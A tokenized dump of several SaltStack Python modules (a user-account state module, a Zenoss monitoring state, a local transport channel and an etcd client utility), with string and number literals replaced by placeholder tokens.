'<STR_LIT>' ] = warndays <EOL> if expire and lshad [ '<STR_LIT>' ] != expire : <EOL> change [ '<STR_LIT>' ] = expire <EOL> elif '<STR_LIT>' in __salt__ and salt . utils . is_windows ( ) : <EOL> if expire and expire is not - <NUM_LIT:1> and salt . utils . date_format ( lshad [ '<STR_LIT>' ] ) != salt . utils . date_format ( expire ) : <EOL> change [ '<STR_LIT>' ] = expire <EOL> fullname = sdecode_if_string ( fullname ) <EOL> lusr [ '<STR_LIT>' ] = sdecode_if_string ( lusr [ '<STR_LIT>' ] ) <EOL> if fullname is not None and lusr [ '<STR_LIT>' ] != fullname : <EOL> change [ '<STR_LIT>' ] = fullname <EOL> if win_homedrive and lusr [ '<STR_LIT>' ] != win_homedrive : <EOL> change [ '<STR_LIT>' ] = win_homedrive <EOL> if win_profile and lusr [ '<STR_LIT>' ] != win_profile : <EOL> change [ '<STR_LIT>' ] = win_profile <EOL> if win_logonscript and lusr [ '<STR_LIT>' ] != win_logonscript : <EOL> change [ '<STR_LIT>' ] = win_logonscript <EOL> if win_description and lusr [ '<STR_LIT:description>' ] != win_description : <EOL> change [ '<STR_LIT:description>' ] = win_description <EOL> if '<STR_LIT>' in __salt__ and roomnumber is not None : <EOL> roomnumber = sdecode_if_string ( roomnumber ) <EOL> lusr [ '<STR_LIT>' ] = sdecode_if_string ( lusr [ '<STR_LIT>' ] ) <EOL> if lusr [ '<STR_LIT>' ] != roomnumber : <EOL> change [ '<STR_LIT>' ] = roomnumber <EOL> if '<STR_LIT>' in __salt__ and workphone is not None : <EOL> workphone = sdecode_if_string ( workphone ) <EOL> lusr [ '<STR_LIT>' ] = sdecode_if_string ( lusr [ '<STR_LIT>' ] ) <EOL> if lusr [ '<STR_LIT>' ] != workphone : <EOL> change [ '<STR_LIT>' ] = workphone <EOL> if '<STR_LIT>' in __salt__ and homephone is not None : <EOL> homephone = sdecode_if_string ( homephone ) <EOL> lusr [ '<STR_LIT>' ] = sdecode_if_string ( lusr [ '<STR_LIT>' ] ) <EOL> if lusr [ '<STR_LIT>' ] != homephone : <EOL> change [ '<STR_LIT>' ] = homephone <EOL> if __grains__ [ '<STR_LIT>' ] in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if loginclass : <EOL> if __salt__ [ '<STR_LIT>' ] ( name ) != loginclass : <EOL> change [ '<STR_LIT>' ] = loginclass <EOL> return change <EOL> def present ( name , <EOL> uid = None , <EOL> gid = None , <EOL> gid_from_name = False , <EOL> groups = None , <EOL> optional_groups = None , <EOL> remove_groups = True , <EOL> home = None , <EOL> createhome = True , <EOL> password = None , <EOL> hash_password = False , <EOL> enforce_password = True , <EOL> empty_password = False , <EOL> shell = None , <EOL> unique = True , <EOL> system = False , <EOL> fullname = None , <EOL> roomnumber = None , <EOL> workphone = None , <EOL> homephone = None , <EOL> loginclass = None , <EOL> date = None , <EOL> mindays = None , <EOL> maxdays = None , <EOL> inactdays = None , <EOL> warndays = None , <EOL> expire = None , <EOL> win_homedrive = None , <EOL> win_profile = None , <EOL> win_logonscript = None , <EOL> win_description = None ) : <EOL> '''<STR_LIT>''' <EOL> if password and hash_password : <EOL> log . debug ( '<STR_LIT>' ) <EOL> password = __salt__ [ '<STR_LIT>' ] ( password ) <EOL> if fullname is not None : <EOL> fullname = sdecode ( fullname ) <EOL> if roomnumber is not None : <EOL> roomnumber = sdecode ( roomnumber ) <EOL> if workphone is not None : <EOL> workphone = sdecode ( workphone ) <EOL> if homephone is not None : <EOL> homephone = sdecode ( homephone ) <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' . format ( name ) } <EOL> for gecos_field in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if isinstance ( gecos_field , string_types ) and '<STR_LIT:U+002C>' in gecos_field : <EOL> ret [ '<STR_LIT>' ] = "<STR_LIT>" . format ( gecos_field ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> if groups : <EOL> missing_groups = [ x for x in groups if not __salt__ [ '<STR_LIT>' ] ( x ) ] <EOL> if missing_groups : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' . format ( '<STR_LIT:U+002C>' . join ( missing_groups ) ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> if optional_groups : <EOL> present_optgroups = [ x for x in optional_groups <EOL> if __salt__ [ '<STR_LIT>' ] ( x ) ] <EOL> for missing_optgroup in [ x for x in optional_groups <EOL> if x not in present_optgroups ] : <EOL> log . debug ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( missing_optgroup , name ) ) <EOL> else : <EOL> present_optgroups = None <EOL> if groups and optional_groups : <EOL> for isected in set ( groups ) . intersection ( optional_groups ) : <EOL> log . warning ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( isected , name ) ) <EOL> if gid_from_name : <EOL> gid = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if empty_password : <EOL> __salt__ [ '<STR_LIT>' ] ( name ) <EOL> changes = _changes ( name , <EOL> uid , <EOL> gid , <EOL> groups , <EOL> present_optgroups , <EOL> remove_groups , <EOL> home , <EOL> createhome , <EOL> password , <EOL> enforce_password , <EOL> empty_password , <EOL> shell , <EOL> fullname , <EOL> roomnumber , <EOL> workphone , <EOL> homephone , <EOL> loginclass , <EOL> date , <EOL> mindays , <EOL> maxdays , <EOL> inactdays , <EOL> warndays , <EOL> expire , <EOL> win_homedrive , <EOL> win_profile , <EOL> win_logonscript , <EOL> win_description ) <EOL> if changes : <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> ret [ '<STR_LIT>' ] = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> for key , val in iteritems ( changes ) : <EOL> if key == '<STR_LIT:password>' : <EOL> val = '<STR_LIT>' <EOL> ret [ '<STR_LIT>' ] += u'<STR_LIT>' . format ( key , val ) <EOL> return ret <EOL> if '<STR_LIT>' in __salt__ : <EOL> lshad = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if __grains__ [ '<STR_LIT>' ] in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> lcpre = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> pre = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> for key , val in iteritems ( changes ) : <EOL> if key == '<STR_LIT>' and not empty_password : <EOL> __salt__ [ '<STR_LIT>' ] ( name , password ) <EOL> continue <EOL> if key == '<STR_LIT:date>' : <EOL> __salt__ [ '<STR_LIT>' ] ( name , date ) <EOL> continue <EOL> if key == '<STR_LIT>' and '<STR_LIT>' not in changes : <EOL> if __grains__ [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> __salt__ [ '<STR_LIT>' ] ( name , val ) <EOL> else : <EOL> __salt__ [ '<STR_LIT>' ] ( name , val , False ) <EOL> continue <EOL> if key == '<STR_LIT>' : <EOL> if __grains__ [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> __salt__ [ '<STR_LIT>' ] ( name , val ) <EOL> else : <EOL> __salt__ [ '<STR_LIT>' ] ( name , val , True ) <EOL> if not os . path . isdir ( val ) : <EOL> __salt__ [ '<STR_LIT>' ] ( val , pre [ '<STR_LIT>' ] , pre [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> continue <EOL> if key == '<STR_LIT>' : <EOL> __salt__ [ '<STR_LIT>' ] ( name , mindays ) <EOL> continue <EOL> if key == '<STR_LIT>' : <EOL> __salt__ [ '<STR_LIT>' ] ( name , maxdays ) <EOL> continue <EOL> if key == '<STR_LIT>' : <EOL> __salt__ [ '<STR_LIT>' ] ( name , inactdays ) <EOL> continue <EOL> if key == '<STR_LIT>' : <EOL> __salt__ [ '<STR_LIT>' ] ( name , warndays ) <EOL> continue <EOL> if key == '<STR_LIT>' : <EOL> __salt__ [ '<STR_LIT>' ] ( name , expire ) <EOL> continue <EOL> if key == '<STR_LIT>' : <EOL> __salt__ [ '<STR_LIT>' ] ( name = name , homedrive = val ) <EOL> continue <EOL> if key == '<STR_LIT>' : <EOL> __salt__ [ '<STR_LIT>' ] ( name = name , profile = val ) <EOL> continue <EOL> if key == '<STR_LIT>' : <EOL> __salt__ [ '<STR_LIT>' ] ( name = name , logonscript = val ) <EOL> continue <EOL> if key == '<STR_LIT>' : <EOL> __salt__ [ '<STR_LIT>' ] ( name = name , description = val ) <EOL> continue <EOL> if key == '<STR_LIT>' : <EOL> __salt__ [ '<STR_LIT>' . format ( key ) ] ( <EOL> name , val , not remove_groups <EOL> ) <EOL> else : <EOL> __salt__ [ '<STR_LIT>' . format ( key ) ] ( name , val ) <EOL> post = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> spost = { } <EOL> if '<STR_LIT>' in __salt__ and lshad [ '<STR_LIT>' ] != password : <EOL> spost = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if __grains__ [ '<STR_LIT>' ] in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> lcpost = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> for key in post : <EOL> if post [ key ] != pre [ key ] : <EOL> ret [ '<STR_LIT>' ] [ key ] = post [ key ] <EOL> if '<STR_LIT>' in __salt__ : <EOL> for key in spost : <EOL> if lshad [ key ] != spost [ key ] : <EOL> if key == '<STR_LIT>' : <EOL> ret [ '<STR_LIT>' ] [ key ] = '<STR_LIT>' <EOL> else : <EOL> ret [ '<STR_LIT>' ] [ key ] = spost [ key ] <EOL> if __grains__ [ '<STR_LIT>' ] in ( '<STR_LIT>' , '<STR_LIT>' ) and lcpost != lcpre : <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = lcpost <EOL> if ret [ '<STR_LIT>' ] : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> changes = _changes ( name , <EOL> uid , <EOL> gid , <EOL> groups , <EOL> present_optgroups , <EOL> remove_groups , <EOL> home , <EOL> createhome , <EOL> password , <EOL> enforce_password , <EOL> empty_password , <EOL> shell , <EOL> fullname , <EOL> roomnumber , <EOL> workphone , <EOL> homephone , <EOL> loginclass , <EOL> date , <EOL> mindays , <EOL> maxdays , <EOL> inactdays , <EOL> warndays , <EOL> expire , <EOL> win_homedrive , <EOL> win_profile , <EOL> win_logonscript , <EOL> win_description ) <EOL> if changes : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( <EOL> changes <EOL> ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> if changes is False : <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> if groups and present_optgroups : <EOL> groups . extend ( present_optgroups ) <EOL> elif present_optgroups : <EOL> groups = present_optgroups [ : ] <EOL> if not salt . utils . is_windows ( ) : <EOL> params = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : uid , <EOL> '<STR_LIT>' : gid , <EOL> '<STR_LIT>' : groups , <EOL> '<STR_LIT>' : home , <EOL> '<STR_LIT>' : shell , <EOL> '<STR_LIT>' : unique , <EOL> '<STR_LIT>' : system , <EOL> '<STR_LIT>' : fullname , <EOL> '<STR_LIT>' : roomnumber , <EOL> '<STR_LIT>' : workphone , <EOL> '<STR_LIT>' : homephone , <EOL> '<STR_LIT>' : createhome , <EOL> '<STR_LIT>' : loginclass } <EOL> else : <EOL> params = ( { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:password>' : password , <EOL> '<STR_LIT>' : fullname , <EOL> '<STR_LIT:description>' : win_description , <EOL> '<STR_LIT>' : groups , <EOL> '<STR_LIT>' : home , <EOL> '<STR_LIT>' : win_homedrive , <EOL> '<STR_LIT>' : win_profile , <EOL> '<STR_LIT>' : win_logonscript } ) <EOL> if __salt__ [ '<STR_LIT>' ] ( ** params ) : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> ret [ '<STR_LIT>' ] = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if not createhome : <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if '<STR_LIT>' in __salt__ and not salt . utils . is_windows ( ) and not salt . utils . is_darwin ( ) : <EOL> if password and not empty_password : <EOL> __salt__ [ '<STR_LIT>' ] ( name , password ) <EOL> spost = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if spost [ '<STR_LIT>' ] != password : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' . format ( name , '<STR_LIT>' ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT:password>' ] = '<STR_LIT>' <EOL> if date : <EOL> __salt__ [ '<STR_LIT>' ] ( name , date ) <EOL> spost = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if spost [ '<STR_LIT>' ] != date : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' . format ( name , date ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT:date>' ] = date <EOL> if mindays : <EOL> __salt__ [ '<STR_LIT>' ] ( name , mindays ) <EOL> spost = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if spost [ '<STR_LIT>' ] != mindays : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' . format ( name , mindays ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = mindays <EOL> if maxdays : <EOL> __salt__ [ '<STR_LIT>' ] ( name , maxdays ) <EOL> spost = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if spost [ '<STR_LIT>' ] != maxdays : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' . format ( name , maxdays ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = maxdays <EOL> if inactdays : <EOL> __salt__ [ '<STR_LIT>' ] ( name , inactdays ) <EOL> spost = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if spost [ '<STR_LIT>' ] != inactdays : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' . format ( name , inactdays ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = inactdays <EOL> if warndays : <EOL> __salt__ [ '<STR_LIT>' ] ( name , warndays ) <EOL> spost = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if spost [ '<STR_LIT>' ] != warndays : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' . format ( name , warndays ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = warndays <EOL> if expire : <EOL> __salt__ [ '<STR_LIT>' ] ( name , expire ) <EOL> spost = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if spost [ '<STR_LIT>' ] != expire : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' . format ( name , expire ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = expire <EOL> elif salt . utils . is_windows ( ) : <EOL> if password and not empty_password : <EOL> if not __salt__ [ '<STR_LIT>' ] ( name , password ) : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' . format ( name , '<STR_LIT>' ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if expire : <EOL> __salt__ [ '<STR_LIT>' ] ( name , expire ) <EOL> spost = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if salt . utils . date_format ( spost [ '<STR_LIT>' ] ) != salt . utils . date_format ( expire ) : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' . format ( name , expire ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = spost [ '<STR_LIT>' ] <EOL> elif salt . utils . is_darwin ( ) and password and not empty_password : <EOL> if not __salt__ [ '<STR_LIT>' ] ( name , password ) : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' . format ( name , '<STR_LIT>' ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> else : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> def absent ( name , purge = False , force = False ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> lusr = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if lusr : <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> beforegroups = set ( salt . utils . get_group_list ( name ) ) <EOL> ret [ '<STR_LIT:result>' ] = __salt__ [ '<STR_LIT>' ] ( name , purge , force ) <EOL> aftergroups = set ( [ g for g in beforegroups if __salt__ [ '<STR_LIT>' ] ( g ) ] ) <EOL> if ret [ '<STR_LIT:result>' ] : <EOL> ret [ '<STR_LIT>' ] = { } <EOL> for g in beforegroups - aftergroups : <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' . format ( g ) ] = '<STR_LIT>' <EOL> ret [ '<STR_LIT>' ] [ name ] = '<STR_LIT>' <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> else : <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import logging <EOL> log = logging . getLogger ( __name__ ) <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' in __salt__ : <EOL> return '<STR_LIT>' <EOL> def monitored ( name , device_class = None , collector = '<STR_LIT:localhost>' , prod_state = None ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> ret [ '<STR_LIT:name>' ] = name <EOL> device = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if device : <EOL> ret [ '<STR_LIT:result>' ] = True <EOL> ret [ '<STR_LIT>' ] = None <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> if prod_state : <EOL> if device [ '<STR_LIT>' ] != prod_state : <EOL> __salt__ [ '<STR_LIT>' ] ( prod_state , name ) <EOL> ret [ '<STR_LIT>' ] = { '<STR_LIT>' : '<STR_LIT>' . format ( device [ '<STR_LIT>' ] ) , '<STR_LIT>' : '<STR_LIT>' . format ( prod_state ) } <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> ret [ '<STR_LIT>' ] = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> return ret <EOL> if __salt__ [ '<STR_LIT>' ] ( name , device_class , collector , prod_state ) : <EOL> ret [ '<STR_LIT:result>' ] = True <EOL> ret [ '<STR_LIT>' ] = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> else : <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] = None <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret </s>
<s> from __future__ import absolute_import , print_function <EOL> import logging <EOL> import salt . utils <EOL> from salt . transport . client import ReqChannel <EOL> log = logging . getLogger ( __name__ ) <EOL> class LocalChannel ( ReqChannel ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , opts , ** kwargs ) : <EOL> self . opts = opts <EOL> self . kwargs = kwargs <EOL> self . tries = <NUM_LIT:0> <EOL> def send ( self , load , tries = <NUM_LIT:3> , timeout = <NUM_LIT> ) : <EOL> if self . tries == <NUM_LIT:0> : <EOL> log . debug ( '<STR_LIT>' ) . format ( load ) <EOL> with salt . utils . fopen ( load [ '<STR_LIT:path>' ] ) as f : <EOL> ret = { <EOL> '<STR_LIT:data>' : '<STR_LIT>' . join ( f . readlines ( ) ) , <EOL> '<STR_LIT>' : load [ '<STR_LIT:path>' ] , <EOL> } <EOL> print ( '<STR_LIT>' , ret ) <EOL> else : <EOL> ret = { <EOL> '<STR_LIT:data>' : None , <EOL> '<STR_LIT>' : None , <EOL> } <EOL> self . tries = self . tries + <NUM_LIT:1> <EOL> return ret <EOL> def crypted_transfer_decode_dictentry ( self , load , dictkey = None , tries = <NUM_LIT:3> , timeout = <NUM_LIT> ) : <EOL> super ( LocalChannel , self ) . crypted_transfer_decode_dictentry ( load , <EOL> dictkey = dictkey , <EOL> tries = tries , <EOL> timeout = timeout ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import logging <EOL> from salt . exceptions import CommandExecutionError <EOL> try : <EOL> import etcd <EOL> from urllib3 . exceptions import ReadTimeoutError , MaxRetryError <EOL> HAS_LIBS = True <EOL> except ImportError : <EOL> HAS_LIBS = False <EOL> log = logging . getLogger ( __name__ ) <EOL> class EtcdUtilWatchTimeout ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class EtcdClient ( object ) : <EOL> def __init__ ( self , opts , profile = None ) : <EOL> opts_pillar = opts . get ( '<STR_LIT>' , { } ) <EOL> opts_master = opts_pillar . get ( '<STR_LIT>' , { } ) <EOL> opts_merged = { } <EOL> opts_merged . update ( opts_master ) <EOL> opts_merged . update ( opts_pillar ) <EOL> opts_merged . update ( opts ) <EOL> if profile : <EOL> self . conf = opts_merged . get ( profile , { } ) <EOL> else : <EOL> self . conf = opts_merged <EOL> host = self . conf . get ( '<STR_LIT>' , '<STR_LIT:127.0.0.1>' ) <EOL> port = self . conf . get ( '<STR_LIT>' , <NUM_LIT> ) <EOL> username = self . conf . get ( '<STR_LIT>' ) <EOL> password = self . conf . get ( '<STR_LIT>' ) <EOL> auth = { } <EOL> if username and password : <EOL> auth = { <EOL> '<STR_LIT:username>' : str ( username ) , <EOL> '<STR_LIT:password>' : str ( password ) <EOL> } <EOL> if HAS_LIBS : <EOL> self . client = etcd . Client ( host , port , ** auth ) <EOL> else : <EOL> raise CommandExecutionError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> def watch ( self , key , recurse = False , timeout = <NUM_LIT:0> , index = None ) : <EOL> ret = { <EOL> '<STR_LIT:key>' : key , <EOL> '<STR_LIT:value>' : None , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : False <EOL> } <EOL> try : <EOL> result = self . read ( key , recursive = recurse , wait = True , timeout = timeout , waitIndex = index ) <EOL> except EtcdUtilWatchTimeout : <EOL> try : <EOL> result = self . read ( key ) <EOL> except etcd . EtcdKeyNotFound : <EOL> log . debug ( "<STR_LIT>" ) <EOL> return ret <EOL> except ValueError : <EOL> return { } <EOL> if result and getattr ( result , "<STR_LIT>" ) : <EOL> ret [ '<STR_LIT>' ] = True <EOL> ret [ '<STR_LIT:value>' ] = getattr ( result , '<STR_LIT:value>' ) <EOL> ret [ '<STR_LIT>' ] = getattr ( result , '<STR_LIT>' ) <EOL> return ret <EOL> except ( etcd . EtcdConnectionFailed , MaxRetryError ) : <EOL> log . error ( "<STR_LIT>" . format ( key ) ) <EOL> return { } <EOL> except ValueError : <EOL> return { } <EOL> if recurse : <EOL> ret [ '<STR_LIT:key>' ] = getattr ( result , '<STR_LIT:key>' , None ) <EOL> ret [ '<STR_LIT:value>' ] = getattr ( result , '<STR_LIT:value>' , None ) <EOL> ret [ '<STR_LIT>' ] = getattr ( result , '<STR_LIT>' , None ) <EOL> ret [ '<STR_LIT>' ] = True <EOL> ret [ '<STR_LIT>' ] = getattr ( result , '<STR_LIT>' ) <EOL> return ret <EOL> def get ( self , key , recurse = False ) : <EOL> try : <EOL> result = self . read ( key , recursive = recurse ) <EOL> except etcd . EtcdKeyNotFound : <EOL> return None <EOL> except etcd . EtcdConnectionFailed : <EOL> log . error ( "<STR_LIT>" . format ( key ) ) <EOL> return None <EOL> except ValueError : <EOL> return None <EOL> return getattr ( result , '<STR_LIT:value>' , None ) <EOL> def read ( self , key , recursive = False , wait = False , timeout = None , waitIndex = None ) : <EOL> try : <EOL> if waitIndex : <EOL> result = self . client . read ( key , recursive = recursive , wait = wait , timeout = timeout , waitIndex = waitIndex ) <EOL> else : <EOL> result = self . client . read ( key , recursive = recursive , wait = wait , timeout = timeout ) <EOL> except ( etcd . EtcdConnectionFailed , etcd . EtcdKeyNotFound ) as err : <EOL> log . error ( "<STR_LIT>" . format ( err ) ) <EOL> raise <EOL> except ReadTimeoutError : <EOL> if wait : <EOL> log . debug ( "<STR_LIT>" ) <EOL> raise EtcdUtilWatchTimeout ( "<STR_LIT>" . format ( key ) ) <EOL> log . error ( "<STR_LIT>" ) <EOL> raise etcd . EtcdConnectionFailed ( "<STR_LIT>" ) <EOL> except MaxRetryError as err : <EOL> log . error ( "<STR_LIT>" ) <EOL> raise etcd . EtcdConnectionFailed ( "<STR_LIT>" ) <EOL> except etcd . EtcdException as err : <EOL> log . error ( "<STR_LIT>" . format ( err ) ) <EOL> raise <EOL> except ValueError : <EOL> log . error ( "<STR_LIT>" ) <EOL> raise <EOL> except Exception as err : <EOL> log . error ( '<STR_LIT>' . format ( err ) ) <EOL> raise <EOL> return result <EOL> def _flatten ( self , data , path = '<STR_LIT>' ) : <EOL> if len ( data . keys ( ) ) == <NUM_LIT:0> : <EOL> return { path : { } } <EOL> path = path . strip ( '<STR_LIT:/>' ) <EOL> flat = { } <EOL> for k , v in data . iteritems ( ) : <EOL> k = k . strip ( '<STR_LIT:/>' ) <EOL> if path : <EOL> p = '<STR_LIT>' . format ( path , k ) <EOL> else : <EOL> p = '<STR_LIT>' . format ( k ) <EOL> if isinstance ( v , dict ) : <EOL> ret = self . _flatten ( v , p ) <EOL> flat . update ( ret ) <EOL> else : <EOL> flat [ p ] = v <EOL> return flat <EOL> def update ( self , fields , path = '<STR_LIT>' ) : <EOL> if not isinstance ( fields , dict ) : <EOL> log . error ( '<STR_LIT>' ) <EOL> return None <EOL> fields = self . _flatten ( fields , path ) <EOL> keys = { } <EOL> for k , v in fields . iteritems ( ) : <EOL> is_dir = False <EOL> if isinstance ( v , dict ) : <EOL> is_dir = True <EOL> keys [ k ] = self . write ( k , v , directory = is_dir ) <EOL> return keys <EOL> def set ( self , key , value , ttl = None , directory = False ) : <EOL> return self . write ( key , value , ttl = ttl , directory = directory ) <EOL> def write ( self , key , value , ttl = None , directory = False ) : <EOL> if directory : <EOL> value = None <EOL> try : <EOL> result = self . client . write ( key , value , ttl = ttl , dir = directory ) <EOL> except ( etcd . EtcdNotFile , etcd . EtcdNotDir , etcd . EtcdRootReadOnly , ValueError ) as err : <EOL> log . error ( '<STR_LIT>' . format ( err ) ) <EOL> return None <EOL> except MaxRetryError as err : <EOL> log . error ( "<STR_LIT>" . format ( err ) ) <EOL> return None <EOL> except Exception as err : <EOL> log . error ( '<STR_LIT>' . format ( err ) ) <EOL> raise <EOL> if directory : <EOL> return getattr ( result , '<STR_LIT>' ) <EOL> else : <EOL> return getattr ( result , '<STR_LIT:value>' ) <EOL> def ls ( self , path ) : <EOL> ret = { } <EOL> try : <EOL> items = self . read ( path ) <EOL> except ( etcd . EtcdKeyNotFound , ValueError ) : <EOL> return { } <EOL> except etcd . EtcdConnectionFailed : <EOL> log . error ( "<STR_LIT>" . format ( path ) ) <EOL> return None <EOL> for item in items . children : <EOL> if item . dir is True : <EOL> if item . key == path : <EOL> continue <EOL> dir_name = '<STR_LIT>' . format ( item . key ) <EOL> ret [ dir_name ] = { } <EOL> else : <EOL> ret [ item . key ] = item . value <EOL> return { path : ret } <EOL> def rm ( self , key , recurse = False ) : <EOL> return self . delete ( key , recurse ) <EOL> def delete ( self , key , recursive = False ) : <EOL> try : <EOL> if self . client . delete ( key , recursive = recursive ) : <EOL> return True <EOL> else : <EOL> return False <EOL> except ( etcd . EtcdNotFile , etcd . EtcdRootReadOnly , etcd . EtcdDirNotEmpty , etcd . EtcdKeyNotFound , ValueError ) as err : <EOL> log . error ( '<STR_LIT>' . format ( err ) ) <EOL> return None <EOL> except MaxRetryError as err : <EOL> log . error ( '<STR_LIT>' . format ( err ) ) <EOL> return None <EOL> except Exception as err : <EOL> log . error ( '<STR_LIT>' . format ( err ) ) <EOL> raise 